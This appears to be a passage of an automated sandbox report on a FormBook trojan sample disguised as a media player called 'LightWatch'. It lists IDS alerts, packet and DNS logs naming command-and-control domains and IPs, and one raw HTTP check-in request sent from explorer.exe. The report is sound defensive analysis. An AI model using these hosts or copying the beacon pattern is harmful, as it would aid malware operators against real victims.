.reloc	0xba000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xb8090	0x36c	data
RT_MANIFEST	0xb840c	0xa85	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	NameCache.exe
FileVersion	1.0.1.35
CompanyName	Unguest
LegalTrademarks	Unguest
Comments	A light media player
ProductName	LightWatch
ProductVersion	1.0.1.35
FileDescription	LightWatch
OriginalFilename	NameCache.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/21-16:51:12.447180	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	34.102.136.180	192.168.2.3
05/03/21-16:51:17.587124	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	34.102.136.180
05/03/21-16:51:17.587124	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	34.102.136.180
05/03/21-16:51:17.587124	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49738	80	192.168.2.3	34.102.136.180
05/03/21-16:51:17.729289	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49738	34.102.136.180	192.168.2.3
05/03/21-16:51:28.192008	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49745	34.102.136.180	192.168.2.3
05/03/21-16:51:33.349998	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	34.102.136.180
05/03/21-16:51:33.349998	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	34.102.136.180
05/03/21-16:51:33.349998	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.3	34.102.136.180
05/03/21-16:51:33.487458	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49746	34.102.136.180	192.168.2.3
05/03/21-16:51:38.629651	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
05/03/21-16:51:38.629651	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
05/03/21-16:51:38.629651	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.3	34.102.136.180
05/03/21-16:51:38.766555	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49747	34.102.136.180	192.168.2.3
05/03/21-16:51:49.181249	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	81.17.18.196
05/03/21-16:51:49.181249	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	81.17.18.196
05/03/21-16:51:49.181249	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.3	81.17.18.196
05/03/21-16:51:59.515071	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.3	206.189.50.215
05/03/21-16:51:59.515071	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.3	206.189.50.215
05/03/21-16:51:59.515071	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49751	80	192.168.2.3	206.189.50.215
05/03/21-16:52:04.990890	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	192.185.131.134
05/03/21-16:52:04.990890	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	192.185.131.134
05/03/21-16:52:04.990890	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49752	80	192.168.2.3	192.185.131.134
05/03/21-16:52:15.430581	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	46.30.211.38
05/03/21-16:52:15.430581	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	46.30.211.38
05/03/21-16:52:15.430581	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49754	80	192.168.2.3	46.30.211.38

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 16:51:01.838931084 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:01.999315023 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:01.999450922 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:01.999663115 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.159781933 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.166860104 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.166877985 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.166970968 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:02.167031050 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.167073965 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.167079926 CEST	49734	80	192.168.2.3	74.208.236.36
May 3, 2021 16:51:02.328871965 CEST	80	49734	74.208.236.36	192.168.2.3
May 3, 2021 16:51:12.268404961 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.309473038 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.309567928 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.309696913 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.350687027 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.447180033 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.447208881 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:12.447412968 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.447560072 CEST	49737	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:12.488730907 CEST	80	49737	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.543899059 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.585552931 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.586942911 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.587124109 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.629646063 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.729289055 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.729310989 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:17.729551077 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.729571104 CEST	49738	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:17.771555901 CEST	80	49738	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.013853073 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.054970980 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.055130959 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.055273056 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.096163034 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.192008018 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.192035913 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:28.192183971 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.192226887 CEST	49745	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:28.233724117 CEST	80	49745	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.307164907 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.349216938 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.349685907 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.349997997 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.390871048 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.487457991 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.487482071 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:33.487649918 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.487713099 CEST	49746	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:33.528758049 CEST	80	49746	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.586014032 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.629160881 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.629354954 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.629651070 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.670553923 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.766555071 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.766638041 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:38.766936064 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.768503904 CEST	49747	80	192.168.2.3	34.102.136.180
May 3, 2021 16:51:38.809364080 CEST	80	49747	34.102.136.180	192.168.2.3
May 3, 2021 16:51:49.136158943 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.180980921 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.181178093 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.181248903 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.226030111 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.240447044 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.240470886 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:49.240613937 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.240660906 CEST	49748	80	192.168.2.3	81.17.18.196
May 3, 2021 16:51:49.285420895 CEST	80	49748	81.17.18.196	192.168.2.3
May 3, 2021 16:51:59.460664988 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.514575005 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.514744997 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.515070915 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.568831921 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.569699049 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.569724083 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:51:59.569962978 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.570087910 CEST	49751	80	192.168.2.3	206.189.50.215
May 3, 2021 16:51:59.623846054 CEST	80	49751	206.189.50.215	192.168.2.3
May 3, 2021 16:52:04.827341080 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:04.990329981 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:04.990514994 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:04.990890026 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:05.153763056 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:05.163970947 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:05.163997889 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:05.164314985 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:05.164418936 CEST	49752	80	192.168.2.3	192.185.131.134
May 3, 2021 16:52:05.327270985 CEST	80	49752	192.185.131.134	192.168.2.3
May 3, 2021 16:52:15.364093065 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.430095911 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.430296898 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.430581093 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.496320009 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.504179001 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.504198074 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:15.504400969 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.504472017 CEST	49754	80	192.168.2.3	46.30.211.38
May 3, 2021 16:52:15.570113897 CEST	80	49754	46.30.211.38	192.168.2.3
May 3, 2021 16:52:25.929172993 CEST	49755	80	192.168.2.3	74.208.236.36
May 3, 2021 16:52:26.091253042 CEST	80	49755	74.208.236.36	192.168.2.3
May 3, 2021 16:52:26.091440916 CEST	49755	80	192.168.2.3	74.208.236.36
May 3, 2021 16:52:26.091522932 CEST	49755	80	192.168.2.3	74.208.236.36
May 3, 2021 16:52:26.253413916 CEST	80	49755	74.208.236.36	192.168.2.3
May 3, 2021 16:52:26.259051085 CEST	80	49755	74.208.236.36	192.168.2.3
May 3, 2021 16:52:26.259092093 CEST	80	49755	74.208.236.36	192.168.2.3
May 3, 2021 16:52:26.259105921 CEST	80	49755	74.208.236.36	192.168.2.3
May 3, 2021 16:52:26.259268999 CEST	49755	80	192.168.2.3	74.208.236.36
May 3, 2021 16:52:26.259305000 CEST	49755	80	192.168.2.3	74.208.236.36
May 3, 2021 16:52:26.421200037 CEST	80	49755	74.208.236.36	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 16:50:08.811388969 CEST	49199	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:08.869915009 CEST	53	49199	8.8.8.8	192.168.2.3
May 3, 2021 16:50:09.509768963 CEST	50620	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:09.574763060 CEST	53	50620	8.8.8.8	192.168.2.3
May 3, 2021 16:50:13.393687963 CEST	64938	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:13.445195913 CEST	53	64938	8.8.8.8	192.168.2.3
May 3, 2021 16:50:16.809784889 CEST	60152	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:16.861000061 CEST	53	60152	8.8.8.8	192.168.2.3
May 3, 2021 16:50:17.378694057 CEST	57544	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:17.435731888 CEST	53	57544	8.8.8.8	192.168.2.3
May 3, 2021 16:50:17.628050089 CEST	55984	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:17.676754951 CEST	53	55984	8.8.8.8	192.168.2.3
May 3, 2021 16:50:18.627727032 CEST	64185	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:18.679233074 CEST	53	64185	8.8.8.8	192.168.2.3
May 3, 2021 16:50:19.724458933 CEST	65110	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:19.774852991 CEST	53	65110	8.8.8.8	192.168.2.3
May 3, 2021 16:50:21.362386942 CEST	58361	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:21.411184072 CEST	53	58361	8.8.8.8	192.168.2.3
May 3, 2021 16:50:22.225343943 CEST	63492	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:22.274000883 CEST	53	63492	8.8.8.8	192.168.2.3
May 3, 2021 16:50:23.158615112 CEST	60831	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:23.217219114 CEST	53	60831	8.8.8.8	192.168.2.3
May 3, 2021 16:50:24.119350910 CEST	60100	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:24.170926094 CEST	53	60100	8.8.8.8	192.168.2.3
May 3, 2021 16:50:24.901106119 CEST	53195	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:24.951069117 CEST	53	53195	8.8.8.8	192.168.2.3
May 3, 2021 16:50:25.677542925 CEST	50141	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:25.731005907 CEST	53	50141	8.8.8.8	192.168.2.3
May 3, 2021 16:50:26.809788942 CEST	53023	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:26.858412027 CEST	53	53023	8.8.8.8	192.168.2.3
May 3, 2021 16:50:27.612881899 CEST	49563	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:27.664334059 CEST	53	49563	8.8.8.8	192.168.2.3
May 3, 2021 16:50:28.422533989 CEST	51352	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:28.473973036 CEST	53	51352	8.8.8.8	192.168.2.3
May 3, 2021 16:50:29.377460003 CEST	59349	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:29.426270962 CEST	53	59349	8.8.8.8	192.168.2.3
May 3, 2021 16:50:32.246200085 CEST	57084	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:32.303208113 CEST	53	57084	8.8.8.8	192.168.2.3
May 3, 2021 16:50:33.522645950 CEST	58823	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:33.571369886 CEST	53	58823	8.8.8.8	192.168.2.3
May 3, 2021 16:50:34.363800049 CEST	57568	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:34.412540913 CEST	53	57568	8.8.8.8	192.168.2.3
May 3, 2021 16:50:37.427102089 CEST	50540	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:37.475810051 CEST	53	50540	8.8.8.8	192.168.2.3
May 3, 2021 16:50:38.024178982 CEST	54366	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:38.085119963 CEST	53	54366	8.8.8.8	192.168.2.3
May 3, 2021 16:50:53.407485008 CEST	53034	53	192.168.2.3	8.8.8.8
May 3, 2021 16:50:53.459784031 CEST	53	53034	8.8.8.8	192.168.2.3
May 3, 2021 16:51:01.768326998 CEST	57762	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:01.833236933 CEST	53	57762	8.8.8.8	192.168.2.3
May 3, 2021 16:51:02.705568075 CEST	55435	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:02.754239082 CEST	53	55435	8.8.8.8	192.168.2.3
May 3, 2021 16:51:03.928236961 CEST	50713	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:03.976876020 CEST	53	50713	8.8.8.8	192.168.2.3
May 3, 2021 16:51:12.193563938 CEST	56132	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:12.267481089 CEST	53	56132	8.8.8.8	192.168.2.3
May 3, 2021 16:51:17.476492882 CEST	58987	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:17.542897940 CEST	53	58987	8.8.8.8	192.168.2.3
May 3, 2021 16:51:19.451631069 CEST	56579	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:19.511034966 CEST	53	56579	8.8.8.8	192.168.2.3
May 3, 2021 16:51:21.929121971 CEST	60633	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:21.986923933 CEST	53	60633	8.8.8.8	192.168.2.3
May 3, 2021 16:51:22.741216898 CEST	61292	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:22.925550938 CEST	53	61292	8.8.8.8	192.168.2.3
May 3, 2021 16:51:27.943416119 CEST	63619	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:28.005670071 CEST	53	63619	8.8.8.8	192.168.2.3
May 3, 2021 16:51:33.235909939 CEST	64938	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:33.305274963 CEST	53	64938	8.8.8.8	192.168.2.3
May 3, 2021 16:51:38.509706020 CEST	61946	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:38.584916115 CEST	53	61946	8.8.8.8	192.168.2.3
May 3, 2021 16:51:43.773622036 CEST	64910	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:44.020522118 CEST	53	64910	8.8.8.8	192.168.2.3
May 3, 2021 16:51:49.062645912 CEST	52123	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:49.135061979 CEST	53	52123	8.8.8.8	192.168.2.3
May 3, 2021 16:51:49.520376921 CEST	56130	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:49.570616961 CEST	53	56130	8.8.8.8	192.168.2.3
May 3, 2021 16:51:49.993237019 CEST	56338	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:50.058635950 CEST	53	56338	8.8.8.8	192.168.2.3
May 3, 2021 16:51:54.263361931 CEST	59420	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:54.351383924 CEST	53	59420	8.8.8.8	192.168.2.3
May 3, 2021 16:51:59.368172884 CEST	58784	53	192.168.2.3	8.8.8.8
May 3, 2021 16:51:59.459358931 CEST	53	58784	8.8.8.8	192.168.2.3
May 3, 2021 16:52:04.634169102 CEST	63978	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:04.821580887 CEST	53	63978	8.8.8.8	192.168.2.3
May 3, 2021 16:52:10.187788010 CEST	62938	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:10.266602039 CEST	53	62938	8.8.8.8	192.168.2.3
May 3, 2021 16:52:10.921250105 CEST	55708	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:10.969866037 CEST	53	55708	8.8.8.8	192.168.2.3
May 3, 2021 16:52:15.277559042 CEST	56803	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:15.361716986 CEST	53	56803	8.8.8.8	192.168.2.3
May 3, 2021 16:52:20.514333963 CEST	57145	53	192.168.2.3	8.8.8.8
May 3, 2021 16:52:20.917326927 CEST	53	57145	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 3, 2021 16:51:01.768326998 CEST	192.168.2.3	8.8.8.8	0x5dc8	Standard query (0)	www.sloanksmith.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:12.193563938 CEST	192.168.2.3	8.8.8.8	0x5a3b	Standard query (0)	www.letsratethis.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:17.476492882 CEST	192.168.2.3	8.8.8.8	0xaab7	Standard query (0)	www.cannabisllp.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:22.741216898 CEST	192.168.2.3	8.8.8.8	0xe56e	Standard query (0)	www.bestsellerselect.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:27.943416119 CEST	192.168.2.3	8.8.8.8	0xd696	Standard query (0)	www.buffalobooze.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:33.235909939 CEST	192.168.2.3	8.8.8.8	0xb2a6	Standard query (0)	www.checkmytradesmanswork.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:38.509706020 CEST	192.168.2.3	8.8.8.8	0x3ee5	Standard query (0)	www.inthebeginningshop.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:43.773622036 CEST	192.168.2.3	8.8.8.8	0xa742	Standard query (0)	www.shop-daily.info	A (IP address)	IN (0x0001)
May 3, 2021 16:51:49.062645912 CEST	192.168.2.3	8.8.8.8	0x9c89	Standard query (0)	www.madisonroselove.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:54.263361931 CEST	192.168.2.3	8.8.8.8	0x910	Standard query (0)	www.colabchat.com	A (IP address)	IN (0x0001)
May 3, 2021 16:51:59.368172884 CEST	192.168.2.3	8.8.8.8	0xe563	Standard query (0)	www.pedroiniesta.net	A (IP address)	IN (0x0001)
May 3, 2021 16:52:04.634169102 CEST	192.168.2.3	8.8.8.8	0x8eeb	Standard query (0)	www.freecleanlimpieza.com	A (IP address)	IN (0x0001)
May 3, 2021 16:52:10.187788010 CEST	192.168.2.3	8.8.8.8	0x7e98	Standard query (0)	www.zryld.com	A (IP address)	IN (0x0001)
May 3, 2021 16:52:15.277559042 CEST	192.168.2.3	8.8.8.8	0xc201	Standard query (0)	www.graet.design	A (IP address)	IN (0x0001)
May 3, 2021 16:52:20.514333963 CEST	192.168.2.3	8.8.8.8	0xa1c6	Standard query (0)	www.xoyicgv.icu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 3, 2021 16:51:01.833236933 CEST	8.8.8.8	192.168.2.3	0x5dc8	No error (0)	www.sloanksmith.com		74.208.236.36	A (IP address)	IN (0x0001)
May 3, 2021 16:51:12.267481089 CEST	8.8.8.8	192.168.2.3	0x5a3b	No error (0)	www.letsratethis.com	letsratethis.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:12.267481089 CEST	8.8.8.8	192.168.2.3	0x5a3b	No error (0)	letsratethis.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:17.542897940 CEST	8.8.8.8	192.168.2.3	0xaab7	No error (0)	www.cannabisllp.com	cannabisllp.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:17.542897940 CEST	8.8.8.8	192.168.2.3	0xaab7	No error (0)	cannabisllp.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:22.925550938 CEST	8.8.8.8	192.168.2.3	0xe56e	Server failure (2)	www.bestsellerselect.com	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:51:28.005670071 CEST	8.8.8.8	192.168.2.3	0xd696	No error (0)	www.buffalobooze.com	buffalobooze.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:28.005670071 CEST	8.8.8.8	192.168.2.3	0xd696	No error (0)	buffalobooze.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:33.305274963 CEST	8.8.8.8	192.168.2.3	0xb2a6	No error (0)	www.checkmytradesmanswork.com	checkmytradesmanswork.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:33.305274963 CEST	8.8.8.8	192.168.2.3	0xb2a6	No error (0)	checkmytradesmanswork.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:38.584916115 CEST	8.8.8.8	192.168.2.3	0x3ee5	No error (0)	www.inthebeginningshop.com	inthebeginningshop.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:51:38.584916115 CEST	8.8.8.8	192.168.2.3	0x3ee5	No error (0)	inthebeginningshop.com		34.102.136.180	A (IP address)	IN (0x0001)
May 3, 2021 16:51:44.020522118 CEST	8.8.8.8	192.168.2.3	0xa742	Server failure (2)	www.shop-daily.info	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:51:49.135061979 CEST	8.8.8.8	192.168.2.3	0x9c89	No error (0)	www.madisonroselove.com		81.17.18.196	A (IP address)	IN (0x0001)
May 3, 2021 16:51:54.351383924 CEST	8.8.8.8	192.168.2.3	0x910	Name error (3)	www.colabchat.com	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:51:59.459358931 CEST	8.8.8.8	192.168.2.3	0xe563	No error (0)	www.pedroiniesta.net		206.189.50.215	A (IP address)	IN (0x0001)
May 3, 2021 16:51:59.459358931 CEST	8.8.8.8	192.168.2.3	0xe563	No error (0)	www.pedroiniesta.net		3.125.252.47	A (IP address)	IN (0x0001)
May 3, 2021 16:52:04.821580887 CEST	8.8.8.8	192.168.2.3	0x8eeb	No error (0)	www.freecleanlimpieza.com	freecleanlimpieza.com		CNAME (Canonical name)	IN (0x0001)
May 3, 2021 16:52:04.821580887 CEST	8.8.8.8	192.168.2.3	0x8eeb	No error (0)	freecleanlimpieza.com		192.185.131.134	A (IP address)	IN (0x0001)
May 3, 2021 16:52:10.266602039 CEST	8.8.8.8	192.168.2.3	0x7e98	Name error (3)	www.zryld.com	none	none	A (IP address)	IN (0x0001)
May 3, 2021 16:52:15.361716986 CEST	8.8.8.8	192.168.2.3	0xc201	No error (0)	www.graet.design		46.30.211.38	A (IP address)	IN (0x0001)
May 3, 2021 16:52:20.917326927 CEST	8.8.8.8	192.168.2.3	0xa1c6	Name error (3)	www.xoyicgv.icu	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.sloanksmith.com

www.letsratethis.com

www.cannabisllp.com

www.buffalobooze.com

www.checkmytradesmanswork.com

www.inthebeginningshop.com

www.madisonroselove.com

www.pedroiniesta.net

www.freecleanlimpieza.com

www.graet.design

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49734	74.208.236.36	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:01.999663115 CEST	1663	OUT	GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1 Host: www.sloanksmith.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
